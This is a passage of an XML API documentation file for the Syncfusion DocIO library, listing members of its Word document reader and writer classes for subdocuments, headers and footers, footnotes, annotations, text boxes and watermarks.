            <param name="mainReader"> Main document word reader. </param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.GetFld">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.Reset">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.MoveToItem(System.Int32)">
            <summary>
            
            </summary>
            <param name="itemIndex"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.CreateStatePositions">
            <summary>
            Creates object of needed type and fills it with stream positions
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.GetChunkEndPosition(System.Int64)">
            <summary>
            
            </summary>
            <param name="iCurrentPos"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.InitClass">
            <summary>
            Initializes class members
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.UpdateStreamPosition">
            <summary>
            Initializes start/end positioons of reader
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.UpdateEndPositions(System.Int64)">
            <summary>
            
            </summary>
            <param name="iEndPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.UnfreezeStreamPos">
            <summary>
            Unfreeze stream position
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.Type">
            <summary>
            The type of subdocument reader.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.HeaderType">
            <summary>
            Gets/Sets current type of header / footer.
            ( if Type != WordSubdocument.HeaderFooter, returns HeaderType.InvalidValue )
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.ItemNumber">
            <summary>
            Gets number of current footnote 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.StatePositions">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordSubdocumentReader.IsNextItemPos">
            <summary>
            Gets a value indicating whether this is next item pos.
            </summary>
            <value>
            <c>true</c> if this instance is next item pos; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterReader">
            <summary>
            Summary description for HeaderFooter subdocument reader
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterReader.#ctor(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterReader"/> class.
            </summary>
            <param name="mainReader">Main document word reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterReader.Reset">
            <summary>
            Resets subdocument reader state, reading process restarted.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterReader.MoveToSection(System.Int32)">
            <summary>
            Move to specified section
            </summary>
            <param name="iSectionNumber"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterReader.MoveToHeader(Syncfusion.DocIO.ReaderWriter.HeaderType)">
            <summary>
            Move to specified header in currebt section
            </summary>
            <param name="hType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterReader.MoveToItem(System.Int32)">
            <summary>
            
            </summary>
            <param name="itemIndex"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterReader.GetFSPA">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterReader.UpdateStreamPosition">
            <summary>
            Reset as it is HeaderFooter reader
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterReader.CreateStatePositions">
            <summary>
            Creates object and fills it with stream positions.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterReader.StatePositions">
            <summary>
            Gets HFStatePositions object
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordFootnoteReader">
            <summary>
            Summary description for HeaderFooter subdocument reader.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordFootnoteReader.m_prevStreamPos">
            <summary>
            Saves previous position of main stream.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFootnoteReader.#ctor(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Creates subdocument reader of specified type.
            </summary>
            <param name="mainReader"> Main document word reader. </param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFootnoteReader.CreateStatePositions">
            <summary>
            Creates object and fills it with stream positions.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFootnoteReader.CheckPosition">
            <summary>
            Checks current cp position.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFootnoteReader.Init">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFootnoteReader.InitStatePositions">
            <summary>
            Initialize the state positions.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFootnoteReader.IsEndOfItems">
            <summary>
            Determines the end of footnote items.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFootnoteReader.ReadChunk">
            <summary>
            Read next elementary text string*.
            </summary>
            <returns></returns>
            <remarks>
            * - "elementary text string" - string, in which all symbols have the
            identical character/paragraph/section properties.
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordFootnoteReader.IsNextItem">
            <summary>
            Gets a value indicating whether this body refers to next footnote.
            </summary>
            <value>
            <c>true</c> if this body refers to next footnote; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordAnnotationReader">
            <summary>
            Summary description for HeaderFooter subdocument reader.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordAnnotationReader.#ctor(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.WordAnnotationReader"/> class.
            </summary>
            <param name="mainReader">Main document word reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordAnnotationReader.ReadChunk">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordAnnotationReader.CreateStatePositions">
            <summary>
            Creates object and fills it with stream positions.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordAnnotationReader.IsStartAnnotation">
            <summary>
            Gets a value indicating whether this instance is start annotation.
            </summary>
            <value>
            <c>true</c> if this instance is start annotation; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordAnnotationReader.Descriptor">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordAnnotationReader.User">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordAnnotationReader.BookmarkStartOffset">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordAnnotationReader.BookmarkEndOffset">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordAnnotationReader.Position">
            <summary>
            Gets the position of the annotation.
            </summary>
            <value>The get position.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordEndnoteReader">
            <summary>
            Summary description for Endnote subdocument reader.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordEndnoteReader.#ctor(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.WordEndnoteReader"/> class.
            </summary>
            <param name="mainReader">Main document word reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordEndnoteReader.CheckPosition">
            <summary>
            Checks current cp position.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordEndnoteReader.Init">
            <summary>
            Initialize reader.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordEndnoteReader.InitStatePositions">
            <summary>
            Initialize the state positions.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordEndnoteReader.IsEndOfItems">
            <summary>
            Determines the end of footnote items.
            </summary>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordTextBoxReader">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordTextBoxReader.#ctor(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.WordTextBoxReader"/> class.
            </summary>
            <param name="mainReader">Main document word reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordTextBoxReader.CreateStatePositions">
            <summary>
            Creates object of needed type and fills it with stream positions
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHFTextBoxReader.#ctor(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.WordHFTextBoxReader"/> class.
            </summary>
            <param name="mainReader">Main document word reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHFTextBoxReader.CreateStatePositions">
            <summary>
            Creates object of needed type and fills it with stream positions
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordSubdocumentWriter">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordWriterBase">
            <summary>
            Summary description for WordWriterBase.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordWriterBase.DEF_FIELDSHAPETYPE_VAL">
            <summary>
            Fieldshape type value. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordWriterBase.m_type">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.WriteChunk(System.String)">
            <summary>
            Writes text chunk to word file 
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.WriteSafeChunk(System.String)">
            <summary>
            
            </summary>
            <param name="textChunk"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.WriteCellMark(System.Int32)">
            <summary>
            
            </summary>
            <param name="nestingLevel"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.WriteRowMark(System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="nestingLevel"></param>
            <param name="cellCount"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.WriteMarker(Syncfusion.DocIO.ReaderWriter.WordChunkType)">
            <summary>
            Writes marker to word file
            </summary>
            <param name="chunkType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.CreateTableRowDescriptor">
            <summary>
            Creates instance of TableRowDescriptor for current number of cells
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.CreateTableRowDescriptor(System.Int32)">
            <summary>
            Creates instance of TableRowDescriptor for current number of cells
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.CreateTableBorders">
            <summary>
            Creates instance of TableBorders
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertStartField(System.String,System.Boolean)">
            <summary>
            
            </summary>
            <param name="fieldcode"></param>
            <param name="hasSeparator"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertStartField(System.String,Syncfusion.DocIO.DLS.WField,System.Boolean)">
            <summary>
            
            </summary>
            <param name="fieldcode"></param>
            <param name="fieldType"></param>
            <param name="hasSeparator"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertFieldSeparator">
            <summary>
            Insert field separator.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertEndField">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertFieldIndexEntry(System.String)">
            <summary>
            Inserts the field index entry.
            </summary>
            <param name="fieldCode">The field code.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertFormField(System.String,Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField)">
            <summary>
            Insert field to the document 
            </summary>
            <param name="fieldcode"></param>
            <param name="formField"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertHyperlink(System.String,System.String,System.Boolean)">
            <summary>
            
            </summary>
            <param name="displayText"></param>
            <param name="url"></param>
            <param name="isLocalUrl"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertImage(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            
            </summary>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertImage(Syncfusion.DocIO.DLS.WPicture,System.Int32,System.Int32)">
            <summary>
            Insert image
            </summary>
            <param name="picture">Picture</param>
            <param name="height">Picture height</param>
            <param name="width">Picture width</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertShape(Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.ReaderWriter.DataStreamParser.PictureShapeProps)">
            <summary>
            
            </summary>
            <param name="pict"></param>
            <param name="pictProps"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertTextBox(System.Boolean,Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            Insert texbox (shape) to the document
            </summary>
            <param name="txbxFormat">Textbox format</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertInlineTextBox(System.Boolean,Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            Inserts the inline text box.
            </summary>
            <param name="txbxFormat">The textbox format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertShapeObject(Syncfusion.DocIO.DLS.ShapeObject)">
            <summary>
            
            </summary>
            <param name="shapeObj"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertInlineShapeObject(Syncfusion.DocIO.DLS.InlineShapeObject)">
            <summary>
            
            </summary>
            <param name="shapeObj"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertBookmarkStart(System.String,Syncfusion.DocIO.DLS.BookmarkStart)">
            <summary>
            
            </summary>
            <param name="name"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertBookmarkEnd(System.String)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertWatermark(Syncfusion.DocIO.DLS.Watermark,Syncfusion.Layouting.UnitsConvertor,System.Single)">
            <summary>
            Insert watermark.
            </summary>
            <param name="watermark">The watermark.</param>
            <param name="unitsConvertor">The units converter.</param>
            <param name="maxWidth">Maximak width.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.#ctor(Syncfusion.DocIO.ReaderWriter.StreamsManager)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.WordWriterBase"/> class.
            </summary>
            <param name="streamsManager">The streams manager.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.#ctor">
            <summary>
            Default protected constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.IncreaseCcp(System.Int32)">
            <summary>
            
            </summary>
            <param name="dataLength"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InitClass">
            <summary>
            Initialize class members with default values
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.WriteString(System.String)">
            <summary>
            Writes string to word file 
            </summary>
            <param name="text"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.AddChpxProperties(System.Boolean)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.AddPapxProperties">
            <summary>
            Adds the papx properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.UpdateShadingSprms(Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException)">
            <summary>
            Updates the shading SPRMS.
            </summary>
            <param name="paraPropertyException">The para property exception.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.WriteSymbol(System.Char)">
            <summary>
            Writes the symbol.
            </summary>
            <param name="symbol">The symbol.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.WriteChar(System.Char)">
            <summary>
            Writes character to word file
            </summary>
            <param name="symbol"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.WriteNestedMark">
            <summary>
            Writes the nested cell/row mark.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.GetTextPos">
            <summary>
            Gets position in text
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.SetFSPASpid(Syncfusion.DocIO.ReaderWriter.DataStreamParser.BaseProps)">
            <summary>
            
            </summary>
            <param name="props"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.WriteFieldStart(Syncfusion.DocIO.FieldType)">
            <summary>
            Writes the field start.
            </summary>
            <param name="fieldType">Type of the field.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.WriteFieldSeparator">
            <summary>
            Writes the field separator.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.WriteFieldEnd">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.WriteNilPICFAndBinData(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Write the NilPICFAndBinData
            Writes Binary data for reference and hyperlink field
            </summary>
            <param name="field">Field</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.RemoveFormattingString(System.String)">
            <summary>
            Removes the formatting strings
            </summary>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.AddFieldDescriptor(Syncfusion.DocIO.ReaderWriter.Biff_Records.FieldDescriptor,System.Int32)">
            <summary>
            Write start, end, or separator field descriptor to table stream
            </summary>
            <param name="fld"></param>
            <param name="pos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.AddTxBxContainer(System.Boolean,Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            Adds the textbox container.
            </summary>
            <param name="txbxFormat">The textbox format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.SyncTxBxContainer(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,System.Boolean,Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            Syncronize the textbox container.
            </summary>
            <param name="spContainer">The shape container.</param>
            <param name="txbxFormat">The textbox format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.AddPictContainer(Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,Syncfusion.DocIO.ReaderWriter.DataStreamParser.PictureShapeProps)">
            <summary>
            
            </summary>
            <param name="pict"></param>
            <param name="spContainer"></param>
            <param name="pictProps"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.SyncPictContainer(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,Syncfusion.DocIO.ReaderWriter.DataStreamParser.PictureShapeProps,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            
            </summary>
            <param name="spContainer"></param>
            <param name="pictProps"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.UpdateContainers(System.Int32,System.Int32,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            Updates the containers.
            </summary>
            <param name="oldId">The old id.</param>
            <param name="newId">The new id.</param>
            <param name="spContainer">The shape container.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.CreateWatermarkFSPA">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertTextWatermark(Syncfusion.DocIO.DLS.Watermark,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress,Syncfusion.Layouting.UnitsConvertor)">
            <summary>
            Inserts the text watermark.
            </summary>
            <param name="watermark">The watermark.</param>
            <param name="fspa">The File Shape Address.</param>
            <param name="unitsConvertor">The units converter.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.InsertPictureWatermark(Syncfusion.DocIO.DLS.Watermark,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress,Syncfusion.Layouting.UnitsConvertor,System.Single)">
            <summary>
            Inserts the picture watermark.
            </summary>
            <param name="watermark">The watermark.</param>
            <param name="fspa">The File Shape Address.</param>
            <param name="unitsConvertor">The units converter.</param>
            <param name="maxWidth">Max width.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.FitPictureToPage(Syncfusion.DocIO.DLS.PictureWatermark,System.Single,Syncfusion.Layouting.UnitsConvertor)">
            <summary>
            Fits the watermark picture to page.
            </summary>
            <param name="picWatermark">The pic watermark.</param>
            <param name="maxWidth">Width of the max.</param>
            <param name="unitsConvertor">The units converter.</param>
            <returns>Picture size</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.CreatePictureWatermarkCont(Syncfusion.DocIO.DLS.PictureWatermark,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            Creates the picture watermark container.
            </summary>
            <param name="pictWatermark">The picture watermark.</param>
            <param name="pictContainer">The picture container.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.GetWatermarkNumber">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriterBase.IsImageEqual(System.Byte[],System.Byte[])">
            <summary>
            Determines whether the image are equal
            </summary>
            <param name="imageBytes1">Hash value of first image</param>
            <param name="imageBytes2">Hash value of second image</param>
            <returns>
            returns true if image hash are equal.
            </returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriterBase.StyleSheet">
            <summary>
            Gets/sets stylesheet
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriterBase.CurrentStyleIndex">
            <summary>
            Gets/sets current style index
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriterBase.CharacterProperties">
            <summary>
            Gets/sets character properties
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriterBase.ParagraphProperties">
            <summary>
            Gets/sets paragraph properties
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriterBase.BreakCharProperties">
            <summary>
            Gets/sets character properties for paragraph end symbol.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriterBase.ListProperties">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriterBase.Escher">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriterBase.StreamsManager">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriterBase.MainWriter">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriterBase.NextTextId">
            <summary>
            Gets the get next text id.
            </summary>
            <value>The get next text id.</value>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentWriter.#ctor(Syncfusion.DocIO.ReaderWriter.WordWriter)">
            <summary>
            Initializing constructor
            </summary>
            <param name="mainWriter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentWriter.WriteDocumentEnd">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentWriter.WriteItemStart">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentWriter.WriteItemEnd">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordSubdocumentWriter.InitClass">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordSubdocumentWriter.Type">
            <summary>
            Gets/sets type of subdocumnet writer
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordFootnoteWriter">
            <summary>
            Summary description for footnote subdocument writer
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFootnoteWriter.#ctor(Syncfusion.DocIO.ReaderWriter.WordWriter)">
            <summary>
            Creates subdocument writer of specified type.
            </summary>
            <param name="mainWriter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFootnoteWriter.WriteDocumentEnd">
            <summary>
            Writes the end of the document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFootnoteWriter.WriteItemStart">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFootnoteWriter.IncreaseCcp(System.Int32)">
            <summary>
            
            </summary>
            <param name="dataLength"></param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter">
            <summary>
            Summary description for HeaderFooter subdocument writer
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter.m_headerType">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter.m_iItemIndex">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter.m_iSectionIndex">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter.#ctor(Syncfusion.DocIO.ReaderWriter.WordWriter)">
            <summary>
            Creates subdocument reader of specified type.
            </summary>
            <param name="mainWriter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter.WriteDocumentEnd">
            <summary>
            Writes the end of the document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter.WriteSectionEnd">
            <summary>
            Writes the end of the section
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter.ClosePrevSeparator">
            <summary>
            Closes the previous separator types.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter.ClosePrevHeaderTypes(Syncfusion.DocIO.ReaderWriter.HeaderType)">
            <summary>
            
            </summary>
            <param name="headerType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter.IncreaseCcp(System.Int32)">
            <summary>
            
            </summary>
            <param name="dataLength"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter.InitClass">
            <summary>
            Inintializes class members
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter.WriteHeaderFooterHead">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter.HeaderType">
            <summary>
            Gets/sets type of subdocumnet writer
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordAnnotationWriter">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordAnnotationWriter.#ctor(Syncfusion.DocIO.ReaderWriter.WordWriter)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.WordAnnotationWriter"/> class.
            </summary>
            <param name="mainWriter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordAnnotationWriter.WriteDocumentEnd">
            <summary>
